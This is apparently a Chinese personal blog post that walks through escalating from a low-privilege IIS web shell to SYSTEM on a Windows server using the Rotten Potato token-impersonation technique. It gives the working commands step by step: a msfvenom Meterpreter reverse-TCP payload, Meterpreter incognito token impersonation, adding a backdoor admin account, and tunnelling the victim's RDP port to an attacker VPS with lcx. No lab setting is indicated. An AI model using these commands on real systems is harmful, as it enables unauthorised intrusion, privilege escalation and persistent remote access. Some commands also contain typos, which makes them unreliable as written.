标签:ima code dmi 流程 host msfvenom mamicode shel img
此次主题:烂土豆
shell咋拿的 我也忘了 好像是添加友情链接那里还是啥 不重要了
出来了有这几个
然后尝试用MS16-075进行提权 emm 最后有点懵逼
没咋搞懂
后来看一些文章 用到了烂土豆!! 我也直接上烂土豆了
先用msf获取shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port -f exe > /tt.exe
然后msf再设置lhost lport run
打到shell
然后使用ms16-075
emm 简单流程是这样
先常规一波 getsystem !! 成功失败
传到目标服务器上
我用的蚁剑
use incognito
list_tokens -u
IIS我们本来的权限 很低!!
运行他
execute -cH -f ./rottenpotato.exe
system出来了
impersonate_token "NT AUTHORITY\\SYSTEM"
绿了 绿了 成功system
加个用户
net localgrouop Administrator diaomao /add
chcp 65001
vps端
lcx.exe -listen 51 5678
把51端口 转到5678端口上
受害机
lcx.exe -slave VPS的IP 51 本地IP 3389
成功拿捏
标签:ima code dmi 流程 host msfvenom mamicode shel img
原文地址:https://www.cnblogs.com/muxueblog/p/12984959.html